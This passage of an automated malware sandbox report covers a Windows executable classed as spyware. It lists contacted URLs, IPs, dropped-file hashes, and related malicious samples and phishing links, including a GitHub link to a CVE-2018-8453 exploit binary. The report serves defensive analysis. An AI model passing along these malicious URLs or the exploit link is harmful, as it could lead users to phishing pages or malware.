      https://contoso.com/Licensepowershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://ocsp.msocsp.lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://contoso.com/Iconpowershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqsvchost.exe, 00000022.00000000.1854193740.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://github.compowershell.exe, 00000001.00000002.1726618411.0000000004A40000.00000004.00000800.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775569736.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2929519617.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://crl.micropowershell.exe, 00000001.00000002.1734566307.0000000006D5D000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://objects.githubusercontent.compowershell.exe, 00000001.00000002.1726618411.0000000004A61000.00000004.00000800.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://aka.ms/pscore6lBfqpowershell.exe, 00000001.00000002.1726618411.0000000004441000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1730889772.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://aka.ms/pscore68powershell.exe, 00000011.00000002.1799500674.00000202E2201000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000018.00000000.1775569736.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2929519617.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://objects.githubusercontent.compowershell.exe, 00000001.00000002.1726618411.0000000004A7F000.00000004.00000800.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1726618411.0000000004441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2201000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://objects.githubusercontent.com/github-production-release-asset-2e65be/672232730/d6a03019-07cfpowershell.exe, 00000001.00000002.1726618411.0000000004A61000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      140.82.121.4
      github.comUnited States
      36459GITHUBUSfalse
      185.199.110.133
      objects.githubusercontent.comNetherlands
      54113FASTLYUSfalse
      IP
      192.168.2.6
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1451678
      Start date and time:2024-06-04 13:40:12 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 59s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:25
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe
      Detection:MAL
      Classification:mal100.adwa.spyw.evad.winEXE@38/76@2/3
      EGA Information:
      • Successful, ratio: 87%
      HCA Information:
      • Successful, ratio: 79%
      • Number of executed functions: 150
      • Number of non-executed functions: 337
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 20.190.160.20, 40.126.32.68, 20.190.160.22, 20.190.160.17, 40.126.32.76, 40.126.32.134, 40.126.32.133, 40.126.32.138
      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ocsp.edge.digicert.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
      • Execution Graph export aborted for target powershell.exe, PID 7324 because it is empty
      • Execution Graph export aborted for target powershell.exe, PID 7936 because it is empty
      • Execution Graph export aborted for target svc.exe, PID 7576 because it is empty
      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      TimeTypeDescription
      07:41:02API Interceptor86x Sleep call for process: powershell.exe modified
      07:41:08API Interceptor1x Sleep call for process: svc.exe modified
      07:41:45API Interceptor360398x Sleep call for process: winlogon.exe modified
      07:41:46API Interceptor285201x Sleep call for process: lsass.exe modified
      07:41:46API Interceptor1785x Sleep call for process: dialer.exe modified
      07:41:47API Interceptor8646x Sleep call for process: svchost.exe modified
      07:41:49API Interceptor332731x Sleep call for process: dwm.exe modified
      12:41:15Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
      • github.com/ssbb36/stv/raw/main/5.mp3
      185.199.110.133https://advaith07.github.io/Netflix_ui_cloneGet hashmaliciousUnknownBrowse
        cb67a188bafea0fd5f5e9725881c88a1c494763c094f76df73914bd8cadce170_dump.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro StealerBrowse
          https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
            https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
              http://dapp-starter-g3by6mqqf-dung-huynh-duc-kakas-projects.vercel.app/Get hashmaliciousUnknownBrowse
                Scanned_05_28-2024_338500.htmlGet hashmaliciousUnknownBrowse
                  8Zi7xnKKw7.exeGet hashmaliciousPython Stealer, DCRat, Discord Token Stealer, EmpyreanBrowse
                    oc2exe.exeGet hashmaliciousUnknownBrowse
                      http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Get hashmaliciousUnknownBrowse
                        KRPCeWt0II.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          github.comexploit.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 140.82.121.4
                          d-obf.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 140.82.121.4
                          https://exhibitforceex-my.sharepoint.com/:b:/g/personal/michael_yow_exhibitforce_com/Ee7xWbZTr-dMpdN7hsusB_sBFFe4ol53YFm0SuW_9R6YJg?e=Zr4gBoGet hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.4
                          Invoice646737327328282892992.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.3
                          7h2eHzSa61.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                          • 140.82.121.3
                          Drawing specification and Issued PO #07329.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.4
                          Drawing specification and Issued PO #07329.ja.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.3
                          fp2e7a.wpc.phicdn.nethttp://meari.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://eal2023.esGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:be94af7a-734f-4324-8160-e952ef419173Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://clingsconst.li/?c=67145Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://gepkint.quest/park-loader.jsGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://flow.page/sharedfile.dcoGet hashmaliciousHTMLPhisherBrowse
                          • 192.229.221.95
                          http://aaa.stage.15790461.ns1.1U1gpUP5i8KbTVCTq9PeakbLHhZk.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://www.4dots-software.com/simple-disable-key/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          hesaphareketi_01.exeGet hashmaliciousAgentTeslaBrowse
                          • 192.229.221.95
                          https://idaireland.sharepoint.com/:f:/s/ExternalCollaborationSite/Em_R2MeMeZpIoB9tnF5h_Y4BXnuHKyiZkgULelEyOe7AIA?email=Andrew.McMahon%40ocs.com&e=eVquxGGet hashmaliciousHTMLPhisherBrowse
                          • 192.229.221.95
                          objects.githubusercontent.comhttps://exhibitforceex-my.sharepoint.com/:b:/g/personal/michael_yow_exhibitforce_com/Ee7xWbZTr-dMpdN7hsusB_sBFFe4ol53YFm0SuW_9R6YJg?e=Zr4gBoGet hashmaliciousHTMLPhisherBrowse
                          • 185.199.108.133
                          7h2eHzSa61.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                          • 185.199.111.133
                          https://eikwr09672.eleteriod.com/9i86j10253/#ZGFuQGFzdHJhbmlzLmNvbQ==Get hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          https://github.com/hmrc/claim-tax-refund/files/15487332/TaxrefundlistPDF.zipGet hashmaliciousRemcosBrowse
                          • 185.199.111.133
                          https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          Android TV Tools v3_ES.exeGet hashmaliciousUnknownBrowse
                          • 185.199.109.133
                          Android TV Tools v3_EN.exeGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          Android TV Tools v3_ES.exeGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          Android TV Tools v3_EN.exeGet hashmaliciousUnknownBrowse
                          • 185.199.108.133
                          Android TV Tools v3_EN.exeGet hashmaliciousUnknownBrowse
                          • 185.199.109.133
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          FASTLYUShttps://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:be94af7a-734f-4324-8160-e952ef419173Get hashmaliciousUnknownBrowse
                          • 151.101.129.138
                          https://www.4dots-software.com/simple-disable-key/Get hashmaliciousUnknownBrowse
                          • 104.244.43.131
                          https://correspondencetrack.azurewebsites.net/?SmgOcmqUTmbokdRbzrnnQJfUTRbWVscm9zZWJ1aWxkZXJzLmNvbS5hdS9XU0htVGxNdXVWeHh6bkx2P2tpcmsuY2hlZXNtYW5AbmNpLmNvbS5hdQ==Get hashmaliciousUnknownBrowse
                          • 151.101.0.176
                          https://pencairan-dana-giveaway.anakdara9.art/Get hashmaliciousUnknownBrowse
                          • 23.185.0.4
                          https://revlew-page-case-4405729.fb20241.me/help/contact/235944958798777Get hashmaliciousUnknownBrowse
                          • 151.101.1.229
                          https://nickb5942-conatec-toen-actiebelus.pages.dev/help/contact/259770976479606Get hashmaliciousUnknownBrowse
                          • 151.101.129.229
                          https://advaith07.github.io/Netflix_ui_cloneGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          http://registrefilcomannelle.ac-page.com/examenh/Get hashmaliciousUnknownBrowse
                          • 151.101.129.140
                          https://surya-0987.github.io/Netflix_cloneGet hashmaliciousUnknownBrowse
                          • 185.199.110.153
                          https://exhibitforceex-my.sharepoint.com/:b:/g/personal/michael_yow_exhibitforce_com/Ee7xWbZTr-dMpdN7hsusB_sBFFe4ol53YFm0SuW_9R6YJg?e=Zr4gBoGet hashmaliciousHTMLPhisherBrowse
                          • 185.199.108.133
                          GITHUBUSexploit.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 140.82.121.4
                          d-obf.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 140.82.121.4
                          https://advaith07.github.io/Netflix_ui_cloneGet hashmaliciousUnknownBrowse
                          • 140.82.113.18
                          https://exhibitforceex-my.sharepoint.com/:b:/g/personal/michael_yow_exhibitforce_com/Ee7xWbZTr-dMpdN7hsusB_sBFFe4ol53YFm0SuW_9R6YJg?e=Zr4gBoGet hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.4
                          Invoice646737327328282892992.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.4
                          7h2eHzSa61.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                          • 140.82.121.3
                          Drawing specification and Issued PO #07329.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.4
                          http://new-flirt.click/?f=qqrntu&s=687474703a2f2f646174696e6773722e636f6d2f6e65772f3f733d383426263533313839333833383938383631372664693d37672d323031382665643d64657526693d61646d696e38342c38323039372c526f6e6e792e4a61656765724064657574736368656261686e2e636f6d2c2674733d3137313730373738313726313133383530393031393535373338&Get hashmaliciousUnknownBrowse
                          • 140.82.121.6
                          Drawing specification and Issued PO #07329.ja.jarGet hashmaliciousSTRRATBrowse
                          • 140.82.121.4
                          http://dapp-starter-g3by6mqqf-dung-huynh-duc-kakas-projects.vercel.app/Get hashmaliciousUnknownBrowse
                          • 140.82.113.22
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          http://meari.comGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          Financial Invoice Report - STI ME-3051-2024.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          VfeC87R1r6.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          6fFMtJre1M.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          U39qqK8E7o.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          exploit.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          d-obf.batGet hashmaliciousAbobus ObfuscatorBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          Balance payment.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          wells_fargo_statement lnk.lnkGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          • 140.82.121.4
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpH8Q1WRGrzw.exeGet hashmaliciousAsyncRAT, AveMaria, UACMe, VenomRAT, Xmrig, zgRATBrowse
                            vABMEuk0Ie.exeGet hashmaliciousXmrigBrowse
                              Readme.lnkGet hashmaliciousAsyncRAT, AveMaria, UACMe, VenomRAT, Xmrig, zgRATBrowse
                                SecuriteInfo.com.Win64.CrypterX-gen.16599.19591.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousXmrigBrowse
                                    file.exeGet hashmaliciousXmrigBrowse
                                      file.exeGet hashmaliciousXmrigBrowse
                                        file.exeGet hashmalicious000Stealer, Amadey, Glupteba, PrivateLoader, SmokeLoaderBrowse
                                          rust_cheat.exeGet hashmaliciousXmrigBrowse
                                            blaaack.exeGet hashmaliciousRedLineBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\svc.exe
                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                              Category:dropped
                                              Size (bytes):10426648
                                              Entropy (8bit):7.648557200639253
                                              Encrypted:false
                                              SSDEEP:98304:Ri8PI8YhtNar6EzgWmw4386lomr6V3HrP8WXcePQB5FxxJpP8oojTvZf9tn7/gal:RdgrhPaGEwlomO8McYg7Fd0TvZ9t/0y
                                              MD5:327B8ED0CDEBAE6962718656B5A72A4C
                                              SHA1:CA1D9CF5D800C9743DD194A334C149B979FD833E
                                              SHA-256:392CF677345CC76896C49A0C996D224D7DDB5F74CFA443CD8FD26FCF936571BD
                                              SHA-512:237043CC79C2471804C5D66FE22B39DEF95E0A0FEDF4EA438B9A560BF2535DE8F3C40CB0C0818ED4DFCB353D1B7D96772CC142AEB055F5055D21F1B69DE95172
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              • Antivirus: Virustotal, Detection: 68%, Browse
                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...i..d...............&........>.............@..........................................`... ..............................................@..p....p..................)......0...............................(....................B..`............................text...............................`..`.data....n.......n..................@....rdata...O...p...P...Z..............@..@.pdata..............................@..@.xdata..\..........................@..@.bss.....=...............................idata..p....@.....................@....CRT....`....P.....................@....tls.........`.....................@....rsrc........p.....................@....reloc..0..........................@..B........................................................................................................................................................................
                                              Process:C:\Windows\System32\lsass.exe
                                              File Type:very short file (no magic)
                                              Category:modified
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:93B885ADFE0DA089CDF634904FD59F71
                                              SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                              SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                              SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                              Malicious:false
                                              Preview:.
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
